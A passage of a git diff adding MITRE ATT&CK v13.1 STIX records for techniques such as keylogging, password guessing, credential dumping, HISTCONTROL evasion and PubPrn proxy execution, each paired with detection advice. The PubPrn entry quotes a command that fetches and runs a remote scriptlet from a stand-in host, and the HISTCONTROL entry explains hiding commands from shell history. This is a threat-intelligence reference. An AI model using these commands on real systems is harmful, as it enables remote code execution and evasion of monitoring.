"Hardiman, N.. (2012, March 20). Backing up and restoring snapshots on Amazon EC2 machines. Retrieved October 8, 2019." + }, + { + "source_name": "Google - Restore Cloud Snapshot", + "url": "https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots", + "description": "Google. (2019, October 7). Restoring and deleting persistent disk snapshots. Retrieved October 8, 2019." + } + ], + "modified": "2021-03-08T10:33:02.128Z", + "name": "Revert Cloud Instance", + "description": "An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.\n\nAnother variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore Cloud Snapshot)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_detection": "Establish centralized logging of instance activity, which can be used to monitor and review system events even after reverting to a snapshot, rolling back changes, or changing persistence/type of storage. Monitor specifically for events related to snapshots and rollbacks and VM configuration changes, that are occurring outside of normal activity. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "Instance: Instance Modification", + "Instance: Instance Stop", + "Instance: Instance Metadata", + "Instance: Instance Start" + ], + "x_mitre_permissions_required": [ + "User" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--086952c4-5b90-4185-b573-02bad8e11953.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--086952c4-5b90-4185-b573-02bad8e11953.json new file mode 100644 index 0000000000000000000000000000000000000000..c5c9554bbb82301d72e16b3868a3088daf4e9402 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--086952c4-5b90-4185-b573-02bad8e11953.json @@ -0,0 +1,56 @@ +{ + "type": "bundle", + "id": "bundle--9bc8149b-6780-4f03-9418-6b8f6f9b8c2c", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--086952c4-5b90-4185-b573-02bad8e11953", + "type": "attack-pattern", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1148", + "url": "https://attack.mitre.org/techniques/T1148" + }, + { + "external_id": "CAPEC-13", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/13.html" + } + ], + "modified": "2020-02-21T20:57:38.015Z", + "name": "HISTCONTROL", + "description": "The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. This setting can be configured to ignore commands that start with a space by simply setting it to \"ignorespace\". HISTCONTROL can also be set to ignore duplicate commands by setting it to \"ignoredups\". In some Linux systems, this is set by default to \"ignoreboth\" which covers both of the previous examples. This means that \u201c ls\u201d will not be saved, but \u201cls\u201d would be saved by history. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected. Adversaries can use this to operate without leaving traces by simply prepending a space to all of their terminal commands.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_detection": "Correlating a user session with a distinct lack of new commands in their .bash_history can be a clue to suspicious behavior. Additionally, users checking or changing their HISTCONTROL environment variable is also suspicious.", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_defense_bypassed": [ + "Log analysis", + "Host forensic analysis" + ], + "x_mitre_permissions_required": [ + "User" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f.json new file mode 100644 index 0000000000000000000000000000000000000000..b5260407c2b6baf64aaf449a78ec1ce26d2763e9 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f.json @@ -0,0 +1,55 @@ +{ + "type": "bundle", + "id": "bundle--4143b7be-4fbe-4191-b288-66050c8f5112", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f", + "type": "attack-pattern", + "created": "2020-10-02T16:39:33.966Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1592", + "url": "https://attack.mitre.org/techniques/T1592" + }, + { + "source_name": "ATT ScanBox", + "url": "https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks", + "description": "Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks. Retrieved October 19, 2020." + }, + { + "source_name": "ThreatConnect Infrastructure Dec 2020", + "url": "https://threatconnect.com/blog/infrastructure-research-hunting/", + "description": "ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021." + } + ], + "modified": "2021-10-17T16:35:09.878Z", + "name": "Gather Victim Host Information", + "description": "Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_detection": "Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "Internet Scan: Response Content" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0979abf9-4e26-43ec-9b6e-54efc4e70fca.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0979abf9-4e26-43ec-9b6e-54efc4e70fca.json new file mode 100644 index 0000000000000000000000000000000000000000..ea87f998c5d9472ebff71729c98641e4acd068e2 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0979abf9-4e26-43ec-9b6e-54efc4e70fca.json @@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--edd4433f-4641-4c82-8eac-1cd3135dd554", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--0979abf9-4e26-43ec-9b6e-54efc4e70fca", + "type": "attack-pattern", + "created": "2020-10-02T16:58:58.738Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1596.003", + "url": "https://attack.mitre.org/techniques/T1596/003" + }, + { + "source_name": "SSLShopper Lookup", + "url": "https://www.sslshopper.com/ssl-checker.html", + "description": "SSL Shopper. (n.d.). SSL Checker. Retrieved October 20, 2020." + }, + { + "source_name": "Medium SSL Cert", + "url": "https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2", + "description": "Jain, M. (2019, September 16). Export & Download \u2014 SSL Certificate from Server (Site URL). Retrieved October 20, 2020." + } + ], + "modified": "2021-04-15T03:48:37.628Z", + "name": "Digital Certificates", + "description": "Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.\n\nAdversaries may search digital certificate data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about certificates.(Citation: SSLShopper Lookup) Digital certificate data may also be available from artifacts signed by the organization (ex: certificates used from encrypted web traffic are served with content).(Citation: Medium SSL Cert) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4.json new file mode 100644 index 0000000000000000000000000000000000000000..85f54be732738575fff4a8efada6393491168a86 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4.json @@ -0,0 +1,71 @@ +{ + "type": "bundle", + "id": "bundle--cd54fd9f-ebb0-49ef-b159-43cf2be40d45", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T21:01:37.930Z", + "name": "Keylogging", + "description": "Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured.\n\nKeylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:\n\n* Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.\n* Reading raw keystroke data from the hardware buffer.\n* Windows Registry modifications.\n* Custom drivers.\n* [Modify System Image](https://attack.mitre.org/techniques/T1601) may provide adversaries with hooks into the operating system of network devices to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device Attacks) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_detection": "Keyloggers may take many forms, possibly involving modification to the Registry and installation of a driver, setting a hook, or polling to intercept keystrokes. Commonly used API calls include `SetWindowsHook`, `GetKeyState`, and `GetAsyncKeyState`.(Citation: Adventures of a Keystroke) Monitor the Registry and file system for such changes, monitor driver installs, and look for common keylogging API calls. API calls alone are not an indicator of keylogging, but may provide behavioral data that is useful when combined with other information such as new files written to disk and unusual processes.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux", + "Network" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Process: OS API Execution", + "Windows Registry: Windows Registry Key Modification", + "Driver: Driver Load" + ], + "x_mitre_permissions_required": [ + "Administrator", + "root", + "SYSTEM", + "User" + ], + "type": "attack-pattern", + "id": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4", + "created": "2020-02-11T18:58:11.791Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1056/001", + "external_id": "T1056.001" + }, + { + "source_name": "Adventures of a Keystroke", + "description": "Tinaztepe, E. (n.d.). The Adventures of a Keystroke: An in-depth look into keyloggers on Windows. Retrieved April 27, 2016.", + "url": "http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf" + }, + { + "source_name": "Cisco Blog Legacy Device Attacks", + "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.", + "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119.json new file mode 100644 index 0000000000000000000000000000000000000000..b3a23f2c3c14333978e15b80c6d446145965b58c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119.json @@ -0,0 +1,77 @@ +{ + "type": "bundle", + "id": "bundle--23c38f6f-0fdf-4270-95db-c6a060338c29", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-14T23:04:08.394Z", + "name": "Password Guessing", + "description": "Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.\n\nGuessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver)\n\nTypically, management services over commonly used ports are used when guessing passwords. Commonly targeted services include the following:\n\n* SSH (22/TCP)\n* Telnet (23/TCP)\n* FTP (21/TCP)\n* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n* LDAP (389/TCP)\n* Kerberos (88/TCP)\n* RDP / Terminal Services (3389/TCP)\n* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n* MSSQL (1433/TCP)\n* Oracle (1521/TCP)\n* MySQL (3306/TCP)\n* VNC (5900/TCP)\n* SNMP (161/UDP and 162/TCP/UDP)\n\nIn addition to management services, adversaries may \"target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,\" as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018). Further, adversaries may abuse network device interfaces (such as `wlanAPI`) to brute force accessible wifi-router(s) via wireless authentication protocols.(Citation: Trend Micro Emotet 2020)\n\nIn default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows \"logon failure\" event ID 4625.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_contributors": [ + "Microsoft Threat Intelligence Center (MSTIC)", + "Mohamed Kmal" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Windows", + "Azure AD", + "Office 365", + "SaaS", + "IaaS", + "Linux", + "macOS", + "Google Workspace", + "Containers", + "Network" + ], + "x_mitre_version": "1.4", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "User Account: User Account Authentication" + ], + "type": "attack-pattern", + "id": "attack-pattern--09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119", + "created": "2020-02-11T18:38:22.617Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1110/001", + "external_id": "T1110.001" + }, + { + "source_name": "Trend Micro Emotet 2020", + "description": "Cybercrime & Digital Threat Team. (2020, February 13). Emotet Now Spreads via Wi-Fi. Retrieved February 16, 2022.", + "url": "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/emotet-now-spreads-via-wi-fi" + }, + { + "source_name": "Cylance Cleaver", + "description": "Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017.", + "url": "https://web.archive.org/web/20200302085133/https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + }, + { + "source_name": "US-CERT TA18-068A 2018", + "description": "US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted by Cyber Actors. Retrieved October 2, 2019.", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-086A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--09cd431f-eaf4-4d2a-acaf-2a7acfe7ed58.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--09cd431f-eaf4-4d2a-acaf-2a7acfe7ed58.json new file mode 100644 index 0000000000000000000000000000000000000000..7ebfddb4a986d3a3e196b1b5365db410f4a5e8c5 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--09cd431f-eaf4-4d2a-acaf-2a7acfe7ed58.json @@ -0,0 +1,67 @@ +{ + "type": "bundle", + "id": "bundle--fbc35cd2-96fb-44c7-80c2-b11029290a11", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Atul Nair, Qualys" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--09cd431f-eaf4-4d2a-acaf-2a7acfe7ed58", + "created": "2020-02-03T16:49:57.788Z", + "x_mitre_version": "2.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1216.001", + "url": "https://attack.mitre.org/techniques/T1216/001" + }, + { + "source_name": "pubprn", + "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/pubprn", + "description": "Jason Gerend. (2017, October 16). pubprn. Retrieved July 23, 2021." + }, + { + "source_name": "Enigma0x3 PubPrn Bypass", + "url": "https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/", + "description": "Nelson, M. (2017, August 3). WSH INJECTION: A CASE STUDY. Retrieved April 9, 2018." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://attack.mitre.org/techniques/T1059/005) script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) via Cscript.exe. For example, the following code publishes a printer within the specified domain: cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com.(Citation: pubprn)\n\nAdversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second script: parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.\n\nIn later versions of Windows (10+), PubPrn.vbs has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://, vice the script: moniker which could be used to reference remote code via HTTP(S).", + "modified": "2022-04-18T14:55:35.817Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "PubPrn", + "x_mitre_detection": "Monitor script processes, such as `cscript`, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_is_subtechnique": true, + "x_mitre_data_sources": [ + "Command: Command Execution", + "Script: Script Execution", + "Process: Process Creation" + ], + "x_mitre_defense_bypassed": [ + "Digital Certificate Validation", + "Application Control" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0a241b6c-7bb2-48f9-98f7-128145b4d27f.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0a241b6c-7bb2-48f9-98f7-128145b4d27f.json new file mode 100644 index 0000000000000000000000000000000000000000..3f0450dff567a758c66ddb4a4e8f2b9f9a7795d9 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0a241b6c-7bb2-48f9-98f7-128145b4d27f.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--4688f264-0c16-44af-9cf1-c249885e040c", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--0a241b6c-7bb2-48f9-98f7-128145b4d27f", + "type": "attack-pattern", + "created": "2020-10-02T17:05:43.562Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1597.002", + "url": "https://attack.mitre.org/techniques/T1597/002" + }, + { + "source_name": "ZDNET Selling Data", + "url": "https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/", + "description": "Cimpanu, C. (2020, May 9). A hacker group is selling more than 73 million user records on the dark web. Retrieved October 20, 2020." + } + ], + "modified": "2021-04-15T03:44:43.900Z", + "name": "Purchase Technical Data", + "description": "Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.\n\nAdversaries may purchase information about their already identified targets, or use purchased data to discover opportunities for successful breaches. Threat actors may gather various technical details from purchased data, including but not limited to employee contact information, credentials, or specifics regarding a victim\u2019s infrastructure.(Citation: ZDNET Selling Data) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22.json new file mode 100644 index 0000000000000000000000000000000000000000..a4f74b263765fcb22b65bc98d15ed1303a7c301d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22.json @@ -0,0 +1,109 @@ +{ + "type": "bundle", + "id": "bundle--effe4859-c92b-4c2c-94bd-ed1aa4ae5795", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows", + "Linux", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Vincent Le Toux", + "Ed Williams, Trustwave, SpiderLabs" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "type": "attack-pattern", + "created": "2017-05-31T21:30:19.735Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1003", + "url": "https://attack.mitre.org/techniques/T1003" + }, + { + "description": "French, D. (2018, October 2). Detecting Attempts to Steal Passwords from Memory. Retrieved October 11, 2019.", + "url": "https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea", + "source_name": "Medium Detecting Attempts to Steal Passwords from Memory" + }, + { + "url": "https://github.com/mattifestation/PowerSploit", + "description": "PowerSploit. (n.d.). Retrieved December 4, 2014.", + "source_name": "Powersploit" + }, + { + "url": "https://msdn.microsoft.com/library/cc228086.aspx", + "description": "Microsoft. (2017, December 1). MS-DRSR Directory Replication Service (DRS) Remote Protocol. Retrieved December 4, 2017.", + "source_name": "Microsoft DRSR Dec 2017" + }, + { + "url": "https://msdn.microsoft.com/library/dd207691.aspx", + "description": "Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December 4, 2017.", + "source_name": "Microsoft GetNCCChanges" + }, + { + "url": "https://wiki.samba.org/index.php/DRSUAPI", + "description": "SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.", + "source_name": "Samba DRSUAPI" + }, + { + "url": "http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/", + "description": "Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids, Oh My. Retrieved December 4, 2017.", + "source_name": "Harmj0y DCSync Sept 2015" + }, + { + "url": "https://msdn.microsoft.com/library/cc237008.aspx", + "description": "Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol. Retrieved December 6, 2017.", + "source_name": "Microsoft NRPC Dec 2017" + }, + { + "url": "https://msdn.microsoft.com/library/cc245496.aspx", + "description": "Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.", + "source_name": "Microsoft SAMR" + }, + { + "url": "https://adsecurity.org/?p=1729", + "description": "Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation, and Detection. Retrieved December 4, 2017.", + "source_name": "AdSecurity DCSync Sept 2015" + } + ], + "modified": "2022-03-08T21:00:53.436Z", + "name": "OS Credential Dumping", + "description": "Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access 